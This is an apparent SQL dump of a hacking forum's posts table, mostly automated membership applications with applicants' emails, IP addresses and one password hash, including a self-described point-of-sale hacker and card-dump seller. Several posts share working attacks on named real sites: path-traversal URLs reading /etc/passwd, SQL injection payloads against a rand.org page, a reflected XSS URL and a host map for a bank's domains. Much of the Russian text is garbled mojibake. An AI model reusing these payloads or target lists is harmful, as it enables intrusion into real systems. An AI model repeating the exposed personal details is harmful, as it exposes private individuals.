\n[LIST]\n[*][b]name[/b]: https://twitter.com/manugaedu/.../293063089811771392 | https://twitter.com/manugaedu/.../293063089811771392 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2030, 1708, 0, 'Invite', 2, '{$name}', 1410685721, '[SIZE=\'4\'][COLOR=\'Sienna\']cyber0xi[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: cyber0xi@grr.la\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 186.210.142.106\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2037, 1709, 0, 'Invite', 2, '{$name}', 1410704830, '[SIZE=\'4\'][COLOR=\'Sienna\']C0N4N_Ma[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: conan4@outlook.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.250.93.30\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.fallega.tn/vb/member.php?u=2231 | http://www.fallega.tn/vb/member.php?u=2231 \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2039, 1710, 0, 'Invite', 2, '{$name}', 1410740359, '[SIZE=\'4\'][COLOR=\'Sienna\']st0ne[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: mand4rins@jabbim.cz\n[b]e-mail[/b]: cr4zy@tvnet.lv\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 192.99.184.76\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; rv:31.0) Gecko/20100101 Firefox/31.0 Cyberfox/31.1.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: https://twitter.com/STONELoL_ | https://twitter.com/STONELoL_ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2043, 1711, 0, 'null', 9, 'çøтðûúø', 1410780147, 'ÃلĄÂть ÿþûõöðт тут\r\n\r\n[QUOTE]\r\n\r\n[url]http://headtechnology.com/lvaindex.php?eID=tx_cms_showpic&file=../lvaindex.php[/url]\r\n\r\n[url]http://download.playmobil.com/FunAction/Microsites/Figures/DE/img/anleitung/force-download.php?file=force-download[/url].\r\nphp\r\n\r\n[url]http://www.space-doctors.com/download.php?file=../../../../../etc/passwd[/url]\r\n\r\n[url]http://www.atlinc.com/download.php?file=../racing.html[/url]\r\n\r\n[url]http://sanglibankmumbai.com/download.php?file=download.php[/url]\r\n[/QUOTE]', 1, 1, '', 0, 1, 0, 0, 0),
(2049, 1715, 0, 'Invite', 2, '{$name}', 1410807427, '[SIZE=\'4\'][COLOR=\'Sienna\']Davenjah[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: admin@davenjah.su\n[b]e-mail[/b]: greatdumps@gmail.com\n[b]Info[/b]: Point of Sales Machines hacker and Dumps bases seller.\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 195.154.171.5\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.flickr.com/photos/105819545@N05/ | http://www.flickr.com/photos/105819545@N05/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2050, 1716, 0, 'Invite', 2, '{$name}', 1410811430, '[SIZE=\'4\'][COLOR=\'Sienna\']felipe4009[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: felipe4009@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 186.82.54.8\n[*][b]real ip[/b]: 186.82.54.8\n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://www.flickr.com/photos/julianagava/6502850099/ | http://www.flickr.com/photos/julianagava/6502850099/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2051, 1717, 0, 'Invite', 2, '{$name}', 1410821345, '[SIZE=\'4\'][COLOR=\'Sienna\']active[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: active_root2011@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 179.172.135.125\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : Active : fuckendeath@mail.ru : : 759b3f4f2f10b6f149da0b62b30b3bd7\n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://active.lviv.ua | active.lviv.ua \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2052, 1718, 0, 'Invite', 2, '{$name}', 1410821938, '[SIZE=\'4\'][COLOR=\'Sienna\']mask12[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 614009841\n[b]e-mail[/b]: hey223341@hotmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 41.220.69.155\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://mask12.newgrounds.com | mask12.newgrounds.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2055, 1719, 0, 'Invite', 2, '{$name}', 1410868692, '[SIZE=\'4\'][COLOR=\'Sienna\']Blacklotus[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 443843348\n[b]e-mail[/b]: blacklotus@default.im\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 158.181.152.97\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140903 Firefox/24.0 Iceweasel/24.8.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://blacklotus.com.au | blacklotus.com.au \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2056, 1720, 0, 'Invite', 2, '{$name}', 1410870475, '[SIZE=\'4\'][COLOR=\'Sienna\']lolcats[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: ICQ/Jabber\n[b]e-mail[/b]: lollypolly295@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 5.101.96.227\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://lolcats.com | lolcats.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2058, 1721, 0, 'Invite', 2, '{$name}', 1410881729, '[SIZE=\'4\'][COLOR=\'Sienna\']99servers[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 282488\n[b]e-mail[/b]: 99servers@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 93.126.104.169\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (X11; Linux i686; rv:22.0) Gecko/20100101 Firefox/22.0 Iceweasel/22.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://99servers.co.nr | 99servers.co.nr \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2059, 1722, 0, 'Invite', 2, '{$name}', 1410881810, '[SIZE=\'4\'][COLOR=\'Sienna\']PremSocks[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: retc3@swissjabber.ch\n[b]e-mail[/b]: rubberas113@hotmail.com\n[b]Info[/b]: Hi,\r\n\r\nMy name is Michael, as my nickname suggest i\'m mainly looking to provide the socks proxy service to members of your community. We all know, how important anonymization and need for fresh IPS. \r\n\r\nBesides of that i have more than 10 years of IT experience, starting from general administration to reverse enginnering and security auditing and programming. But this account would be dedicated to the service.\r\n\r\nI\'d love to see what your community can offer, and I\'d like to provide your members with my service. It\'d make me feel very happy if you accept me to your board/community.\r\n\r\nRegards\r\nMichael\r\n\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 212.76.143.6\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:32.0) Gecko/20100101 Firefox/32.0\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://premsocks.freshdesk.com | premsocks.freshdesk.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2062, 1724, 0, 'Invite', 2, '{$name}', 1410897230, '[SIZE=\'4\'][COLOR=\'Sienna\']s0upn4z1[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: 663276273\n[b]e-mail[/b]: danielsoup03@gmail.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 197.19.15.26\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://quickfind-beta.kassad.in/profile/na/s0upn4z1/games/ | http://quickfind-beta.kassad.in/profile/na/s0upn4z1/games/ \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2063, 1725, 0, 'Invite', 2, '{$name}', 1410904618, '[SIZE=\'4\'][COLOR=\'Sienna\']aaejisnzs[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: wdewwdds@aol.com\n[b]e-mail[/b]: xsssds@aol.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 83.237.235.81\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2064, 1726, 0, 'null', 9, 'smapp.rand.org', 1410935386, '[quote][url]http://smapp.rand.org/rwtid/incident_detail.php?id=7757[/url]\r\n\r\n[/quote]\r\n\r\n[quote]place: Get\r\nparameter: Id\r\n type: Boolean-based blind\r\n title: And boolean-based blind - where or having clause\r\n payload: Id=7757\' and 4204=4204 and \'pmor\'=\'pmor\r\n\r\n type: Union query\r\n title: Mysql union query (null) - 23 columns\r\n payload: Id=7757\' union all select null,null,null,null,null,null,null,null,concat(0x7172757971,0x53714257654567585941,0x7169696971),null,null,null,null,null,null,null,null,null,null,null,null,null,null#\r\n\r\n type: And/or time-based blind\r\n title: Mysql > 5.0.11 and time-based blind\r\n payload: Id=7757\' and sleep(5) and \'hbyq\'=\'hbyq\r\n[/quote]\r\n\r\nò ñð÷ðх ýøчõ øýтøрõÑÂýþóþ ýõт, ýуöýþ ÷ðûøòðтьÑÂÑÂ', 1, 1, '', 0, 1, 0, 0, 0),
(2065, 1727, 0, 'Invite', 2, '{$name}', 1410963293, '[SIZE=\'4\'][COLOR=\'Sienna\']mini123[/COLOR][/SIZE]\n[QUOTE]\n[b]ICQ/Jabber[/b]: psych0tic@richim.org\n[b]e-mail[/b]: sw0rdf15h@outlook.com\n[b]Info[/b]: *************************************************************************\r\nThe decision will be made automatically, after u send request upload this page again.\r\n*************************************************************************\r\n\r\n*The most important field. Here you must specify the field of self-related knowledge of IT, their skills in various areas, their achievements, releases, profiles on famous it-portals, the possible usefulness of the project, and so on. A small description of yourself welcome. \r\n\r\n \n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']request from:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]ip[/b]: 46.217.147.99\n[*][b]real ip[/b]: \n[*][b]User agent[/b]: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.120 Safari/537.36\n[*][b]Referer[/b]: [url][/url]\n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In our DBs:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\']\n[LIST]\n[*][b]Name[/b] : : : : \n[*][b]E-Mail[/b] : : : : \n[*][b]IP[/b] : : : : \n[/LIST]\n[/SIZE]\n[/QUOTE]\n[SIZE=\'4\'][COLOR=\'Sienna\']In Google:[/COLOR][/SIZE]\n[QUOTE]\n[SIZE=\'1\'] \n[LIST]\n[*][b]name[/b]: http://mini123.com | mini123.com \n[/url] \n[/LIST]\n[/SIZE]\n[/QUOTE]', 1, 0, '', 0, 1, 0, 0, 0),
(2066, 1728, 0, 'Psych0tr1a', 11, 'чекните плиз на баги сÂайты банка тинькофm', 1410967868, 'ÃÂтþ ýõ ýð ÿрþôðöу\nßрþшу чøÑÂтþ ôÃȄʄÂõñÑÂ\nÕÑÂûø ýõ òõрøтõ рðÑÂÑÂúðöу ÿþôрþñýþ ò öðñúõ ðтþ тут ÑÂтõÑÂýÑÂÑŽÑÂÑŒ)\n\nÃÂðùôõýýыõ ñðóø:\n\n[B]xss[/B]\n[code]\nßрþÑÂтðѠÿðÑÂÑÂøòúð\nhttps://kupivkredit-test-fe.tcsbank.ru/main/internet_shops?page=/cabinet/orders%22%3E%3Cscript%3Ealert(1)%3C/script%3E[/code]\n\n[code]Þтúрыòðõü урû\nhttps://e-learning.tcsbank.ru/webtutor/HCC/01_TCS/1/start.html?aicc_sid=5918228343128131129&aicc_url=https%3A%2F%%202Fe-learning.tcsbank.ru%2Fhandler.html\n\nÖüõü ÑÂðüую ñþûьшую ø úрðÑÂøòую úýþÿþчúу ø ÿþ ÿрþшõÑÂтòøю ýõÑÂúþûьøх ÑÂõúуýô ÑÂðùт ýðü ÿрõôûðóðõт ÷ýðúþüÑÂтòþ , ýõ ôûѠøýтøüð þчõòøôýþ\n\nÃÂу ø úþýõчýþ öõ ÿþûõ ѠôûѠòòþôð øüõýø уÑÂ÷òøüþ\nÿрþÑÂтþ payload\n \n[/code]\n\nà ðÑÂúытøõ\n[code]https://kupivkredit-test-fe.tcsbank.ru/page/[/code]\n\n\nÑÂðüø ÑÂðùтøúø чтþ ýðшõû ÿþúðчтþ\n[code]\n=========================\n178.248.239.11\nwww.tcsbank.ru\n=========================\n178.248.239.50\nstatic.tcsbank.ru\n=========================\n178.248.239.54\nfreelance.tcsbank.ru\n=========================\n91.194.226.19\nib.tcsbank.ru\nonline.tcsbank.ru\n=========================\n91.194.226.32\nauth.tcsbank.ru\n=========================\n91.194.226.34\nmobileapp.tcsbank.ru\n=========================\n91.194.226.35\ntarget.tcsbank.ru\n=========================\n91.194.226.38\nws1.tcsbank.ru\n=========================\n91.194.226.41\nmobileappdev.tcsbank.ru\n=========================\n91.194.226.42\nkupivkredit-test-fe.tcsbank.ru\n=========================\n91.194.226.43\nmagentbep.tcsbank.ru\n=========================\n91.194.226.44\nkupivkredit.ru\n=========================\n91.194.226.49\nmail03.tcsbank.ru\n=========================\n91.194.226.53\nacs.tcsbank.ru\n=========================\n91.194.226.120\ntravel.tcsbank.ru\n=========================\n91.194.226.129\nzp.tcsbank.ru\n=========================\n91.194.227.4\ngw-fw.tcsbank.ru\n=========================\n\nkupivkredit.ru\n\nwallet.tinkoff.ru\n\nwww.tinkoffinsurance.ru\n[/code]\n\nõÑÂûø ýðùôõтõ õщё - ôþÿþûýÑÂùтõ', 1, 0, '', 0, 1, 0, 0, 0),
(2067, 1728, 2066, 'null', 9, '', 1410974252, 'ÑÂтуúýø ò ôöðñõр\r\n\r\nхüü..ýõту))\r\n\r\nýðÿøÑÂðû ò ûøчúу', 1, 1, '', 0, 1, 0, 0, 0),
(2070, 1211, 1315, 'Psych0tr1a', 11, '', 1410975214, 'ØýтõрõÑÂýыù фðùû\n\n[code]http://old.donbass.ua/admin/install.php[/code]\n\n\nð тðúöõ þшøñúð ò ýõü\n[code]http://old.donbass.ua/admin/install.php?ch=install[/code]', 1, 0, '', 0, 1, 0, 0, 0),
(2071, 1211, 1315, 'Psych0tr1a', 11, '', 1410975802, 'úþóôð õóþ úþòырÑÂû ò ÿрþшûыù рð÷ ýõчðùýþ ÑÂýõѠтðñûøцу Ѡðôüøýðüø)', 1, 0, '', 0, 1, 0, 0, 0),
